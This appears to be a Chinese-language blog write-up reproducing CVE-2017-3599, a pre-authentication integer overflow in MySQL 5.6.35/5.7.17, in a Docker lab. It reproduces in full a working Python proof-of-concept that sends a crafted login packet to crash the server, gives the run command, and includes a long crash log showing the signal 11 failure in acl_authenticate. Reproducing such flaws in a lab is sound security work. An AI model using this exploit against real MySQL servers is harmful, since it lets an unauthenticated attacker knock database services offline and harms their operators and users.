0%

CVE-2017-3599漏洞复现

发表于 更新于 分类于
本文字数: 3.1k 阅读时长 ≈ 11 分钟
MySQL < 5.6.35 / < 5.7.17 - Integer Overflow - Multiple dos Exploit

参考链接

MySQL < 5.6.35 / < 5.7.17 - Integer Overflow - Multiple dos Exploit

漏洞说明

Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Pluggable Auth). Supported versions that are affected are 5.6.35 and earlier and 5.7.17 and earlier. Easily “exploitable” vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). NOTE: the previous information is from the April 2017 CPU. Oracle has not commented on third-party claims that this issue is an integer overflow in sql/auth/sql_authentication.cc which allows remote attackers to cause a denial of service via a crafted authentication packet.

被测环境

  • docker镜像:mysql:5.6.35
  • 启动被测环境容器:docker run -d -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 pmysql:5.6.35

POC脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
# python2.7

'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''

import socket 
import sys
from struct import pack

'''
CVE-2017-3599 Proof of Concept exploit code.

https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/

Rodrigo Marcos

'''

if len(sys.argv)<2:

    print "Usage: python " + sys.argv[0] + " host [port]"
    exit(0)

else:
    HOST = sys.argv[1]

    if len(sys.argv)>2:
        PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
    else:
        PORT = 3306

print "[+] Creating packet..."

'''
3 bytes		Packet lenth
1 bytes 	Packet number

Login request:

Packet format (when the server is 4.1 or newer):

Bytes       Content
-----       ----
4           client capabilities
4           max packet size
1           charset number
23          reserved (always 0)
n           user name, \0-terminated
n           plugin auth data (e.g. scramble), length encoded
n           database name, \0-terminated
            (if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n           client auth plugin name - \0-terminated string,
            (if CLIENT_PLUGIN_AUTH is set in the capabilities)

'''

# packet_len = '\x64\x00\x00'

packet_num = '\x01'

#Login request packet
packet_cap = '\x85\xa2\xbf\x01'		# client capabilities (default)
packet_max = '\x00\x00\x00\x01'		# max packet size (default)
packet_cset = '\x21'				# charset (default)
p_reserved = '\x00' * 23 			# 23 bytes reserved with nulls (default)
packet_usr =  'test\x00' 			# username null terminated (default)

packet_auth  = '\xff'			# both \xff and \xfe crash the server

'''
Conditions to crash:

1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars

The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''

packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth 
packet_len = pack('i',len(packet))[:3]

request = packet_len + packet_num + packet

print "[+] Connecting to host..."
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    print "[+] Connected."

except:
    print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."	
    s.close()
    print "[+] Exiting."
    exit(0)

print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."

print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request

s.close()

攻击执行

1
python poc.py IP 3306

攻击效果

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
拒绝服务,查看数据库的容器日志:

root@yml-penetration:~/Workspace/cve-2017-3599# docker logs 100
Initializing database
2023-12-19 12:19:33 0 [Note] Ignoring --secure-file-priv value as server is running with --bootstrap.
2023-12-19 12:19:33 0 [Note] /usr/sbin/mysqld (mysqld 5.6.35) starting as process 36 ...
2023-12-19 12:19:33 36 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:33 36 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:33 36 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:33 36 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:33 36 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:33 36 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:33 36 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:33 36 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:33 36 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:33 36 [Note] InnoDB: The first specified data file ./ibdata1 did not exist: a new database to be created!
2023-12-19 12:19:33 36 [Note] InnoDB: Setting file ./ibdata1 size to 12 MB
2023-12-19 12:19:33 36 [Note] InnoDB: Database physically writes the file full: wait...
2023-12-19 12:19:33 36 [Note] InnoDB: Setting log file ./ib_logfile101 size to 48 MB
2023-12-19 12:19:33 36 [Note] InnoDB: Setting log file ./ib_logfile1 size to 48 MB
2023-12-19 12:19:34 36 [Note] InnoDB: Renaming log file ./ib_logfile101 to ./ib_logfile0
2023-12-19 12:19:34 36 [Warning] InnoDB: New log files created, LSN=45781
2023-12-19 12:19:34 36 [Note] InnoDB: Doublewrite buffer not found: creating new
2023-12-19 12:19:34 36 [Note] InnoDB: Doublewrite buffer created
2023-12-19 12:19:34 36 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:34 36 [Warning] InnoDB: Creating foreign key constraint system tables.
2023-12-19 12:19:34 36 [Note] InnoDB: Foreign key constraint system tables created
2023-12-19 12:19:34 36 [Note] InnoDB: Creating tablespace and datafile system tables.
2023-12-19 12:19:34 36 [Note] InnoDB: Tablespace and datafile system tables created.
2023-12-19 12:19:34 36 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:34 36 [Note] InnoDB: 5.6.35 started; log sequence number 0
2023-12-19 12:19:36 36 [Note] Binlog end
2023-12-19 12:19:36 36 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:36 36 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:38 36 [Note] InnoDB: Shutdown completed; log sequence number 1625977


2023-12-19 12:19:38 0 [Note] Ignoring --secure-file-priv value as server is running with --bootstrap.
2023-12-19 12:19:38 0 [Note] /usr/sbin/mysqld (mysqld 5.6.35) starting as process 59 ...
2023-12-19 12:19:38 59 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:38 59 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:38 59 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:38 59 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:38 59 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:38 59 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:38 59 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:38 59 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:38 59 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:38 59 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:38 59 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:38 59 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:38 59 [Note] InnoDB: 5.6.35 started; log sequence number 1625977
2023-12-19 12:19:38 59 [Note] Binlog end
2023-12-19 12:19:38 59 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:38 59 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:40 59 [Note] InnoDB: Shutdown completed; log sequence number 1625987




PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !
To do so, start the server, then issue the following commands:

/usr/bin/mysqladmin -u root password 'new-password'
/usr/bin/mysqladmin -u root -h 100bfe039d09 password 'new-password'

Alternatively you can run:

/usr/bin/mysql_secure_installation

which will also give you the option of removing the test
databases and anonymous user created by default.  This is
strongly recommended for production servers.

See the manual for more instructions.

Please report any problems at http://bugs.mysql.com/

The latest information about MySQL is available on the web at

http://www.mysql.com

Support MySQL by buying support/licenses at http://shop.mysql.com

Note: new default config file not created.
Please make sure your config file is current

WARNING: Default config file /etc/mysql/my.cnf exists on the system
This file will be read by default by the MySQL server
If you do not want to use this, either remove it, or use the
--defaults-file argument to mysqld_safe when starting the server

Database initialized
MySQL init process in progress...
2023-12-19 12:19:40 0 [Note] mysqld (mysqld 5.6.35) starting as process 87 ...
2023-12-19 12:19:40 87 [Note] Plugin 'FEDERATED' is disabled.
2023-12-19 12:19:40 87 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:40 87 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:40 87 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:40 87 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:40 87 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:40 87 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:40 87 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:40 87 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:40 87 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:40 87 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:40 87 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:40 87 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:40 87 [Note] InnoDB: 5.6.35 started; log sequence number 1625987
2023-12-19 12:19:40 87 [Warning] No existing UUID has been found, so we assume that this is the first time that this server has been started. Generating a new UUID: e27a6a12-9e68-11ee-867c-0242ac110002.
2023-12-19 12:19:40 87 [Warning] 'user' entry 'root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Warning] 'user' entry '@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:40 87 [Note] Event Scheduler: Loaded 0 events
2023-12-19 12:19:40 87 [Note] mysqld: ready for connections.
Version: '5.6.35'  socket: '/var/run/mysqld/mysqld.sock'  port: 0  MySQL Community Server (GPL)
Warning: Unable to load '/usr/share/zoneinfo/iso3166.tab' as time zone. Skipping it.
Warning: Unable to load '/usr/share/zoneinfo/leap-seconds.list' as time zone. Skipping it.
Warning: Unable to load '/usr/share/zoneinfo/zone.tab' as time zone. Skipping it.
2023-12-19 12:19:42 87 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.

2023-12-19 12:19:42 87 [Note] mysqld: Normal shutdown

2023-12-19 12:19:42 87 [Note] Giving 0 client threads a chance to die gracefully
2023-12-19 12:19:42 87 [Note] Event Scheduler: Purging the queue. 0 events
2023-12-19 12:19:42 87 [Note] Shutting down slave threads
2023-12-19 12:19:42 87 [Note] Forcefully disconnecting 0 remaining clients
2023-12-19 12:19:42 87 [Note] Binlog end
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'partition'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_DATAFILES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLESPACES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FOREIGN_COLS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FOREIGN'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_FIELDS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_COLUMNS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_INDEXES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLESTATS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_SYS_TABLES'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_INDEX_TABLE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_INDEX_CACHE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_CONFIG'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_BEING_DELETED'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_DELETED'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_FT_DEFAULT_STOPWORD'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_METRICS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_POOL_STATS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_PAGE_LRU'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_BUFFER_PAGE'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_PER_INDEX_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_PER_INDEX'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMPMEM_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMPMEM'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP_RESET'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_CMP'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_LOCK_WAITS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_LOCKS'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'INNODB_TRX'
2023-12-19 12:19:42 87 [Note] Shutting down plugin 'InnoDB'
2023-12-19 12:19:42 87 [Note] InnoDB: FTS optimize thread exiting.
2023-12-19 12:19:42 87 [Note] InnoDB: Starting shutdown...
2023-12-19 12:19:43 87 [Note] InnoDB: Shutdown completed; log sequence number 1625997
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'BLACKHOLE'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'ARCHIVE'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'PERFORMANCE_SCHEMA'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MRG_MYISAM'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MyISAM'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'CSV'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'MEMORY'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'sha256_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'mysql_old_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'mysql_native_password'
2023-12-19 12:19:43 87 [Note] Shutting down plugin 'binlog'
2023-12-19 12:19:43 87 [Note] mysqld: Shutdown complete


MySQL init process done. Ready for start up.

2023-12-19 12:19:44 0 [Note] mysqld (mysqld 5.6.35) starting as process 1 ...
2023-12-19 12:19:44 1 [Note] Plugin 'FEDERATED' is disabled.
2023-12-19 12:19:44 1 [Note] InnoDB: Using atomics to ref count buffer pool pages
2023-12-19 12:19:44 1 [Note] InnoDB: The InnoDB memory heap is disabled
2023-12-19 12:19:44 1 [Note] InnoDB: Mutexes and rw_locks use GCC atomic builtins
2023-12-19 12:19:44 1 [Note] InnoDB: Memory barrier is not used
2023-12-19 12:19:44 1 [Note] InnoDB: Compressed tables use zlib 1.2.8
2023-12-19 12:19:44 1 [Note] InnoDB: Using Linux native AIO
2023-12-19 12:19:44 1 [Note] InnoDB: Not using CPU crc32 instructions
2023-12-19 12:19:44 1 [Note] InnoDB: Initializing buffer pool, size = 128.0M
2023-12-19 12:19:44 1 [Note] InnoDB: Completed initialization of buffer pool
2023-12-19 12:19:44 1 [Note] InnoDB: Highest supported file format is Barracuda.
2023-12-19 12:19:44 1 [Note] InnoDB: 128 rollback segment(s) are active.
2023-12-19 12:19:44 1 [Note] InnoDB: Waiting for purge to start
2023-12-19 12:19:44 1 [Note] InnoDB: 5.6.35 started; log sequence number 1625997
2023-12-19 12:19:44 1 [Note] Server hostname (bind-address): '*'; port: 3306
2023-12-19 12:19:44 1 [Note] IPv6 is available.
2023-12-19 12:19:44 1 [Note]   - '::' resolves to '::';
2023-12-19 12:19:44 1 [Note] Server socket created on IP: '::'.
2023-12-19 12:19:44 1 [Warning] 'proxies_priv' entry '@ root@100bfe039d09' ignored in --skip-name-resolve mode.
2023-12-19 12:19:44 1 [Note] Event Scheduler: Loaded 0 events
2023-12-19 12:19:44 1 [Note] mysqld: ready for connections.
Version: '5.6.35'  socket: '/var/run/mysqld/mysqld.sock'  port: 3306  MySQL Community Server (GPL)
12:21:29 UTC - mysqld got signal 11 ;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help
diagnose the problem, but since we have already crashed, 
something is definitely wrong and this may fail.

key_buffer_size=8388608
read_buffer_size=131072
max_used_connections=1
max_threads=151
thread_count=1
connection_count=1
It is possible that mysqld could use up to 
key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 68108 K  bytes of memory
Hope that's ok; if not, decrease some variables in the equation.

Thread pointer: 0x23d86c0
Attempting backtrace. You can use the following information to find out
where mysqld died. If you see no messages after this, something went
terribly wrong...
stack_bottom = 7f3ca45a1e98 thread_stack 0x40000
mysqld(my_print_stacktrace+0x2c)[0x8c3d5c]
mysqld(handle_fatal_signal+0x481)[0x661df1]
/lib/x86_64-linux-gnu/libpthread.so.0(+0xf890)[0x7f3ccee40890]
/lib/x86_64-linux-gnu/libc.so.6(memchr+0x78)[0x7f3ccd885cd8]
mysqld[0x672dc4]
mysqld[0x683e2d]
mysqld[0x68433e]
mysqld[0x6730a9]
mysqld[0x6724df]
mysqld(_Z16acl_authenticateP3THDj+0x1bd)[0x68450d]
mysqld[0x6abe17]
mysqld(_Z16login_connectionP3THD+0x42)[0x6acbe2]
mysqld(_Z22thd_prepare_connectionP3THD+0x19)[0x6ad329]
mysqld(_Z24do_handle_one_connectionP3THD+0x11c)[0x6ad49c]
mysqld(handle_one_connection+0x40)[0x6ad570]
mysqld(pfs_spawn_thread+0x146)[0x8fa106]
/lib/x86_64-linux-gnu/libpthread.so.0(+0x8064)[0x7f3ccee39064]
/lib/x86_64-linux-gnu/libc.so.6(clone+0x6d)[0x7f3ccd8e962d]

Trying to get some variables.
Some pointers may be invalid and cause the dump to abort.
Query (0): Connection ID (thread ID): 1
Status: NOT_KILLED

The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains
information that should help you find out what is causing the crash.

欢迎关注我的其它发布渠道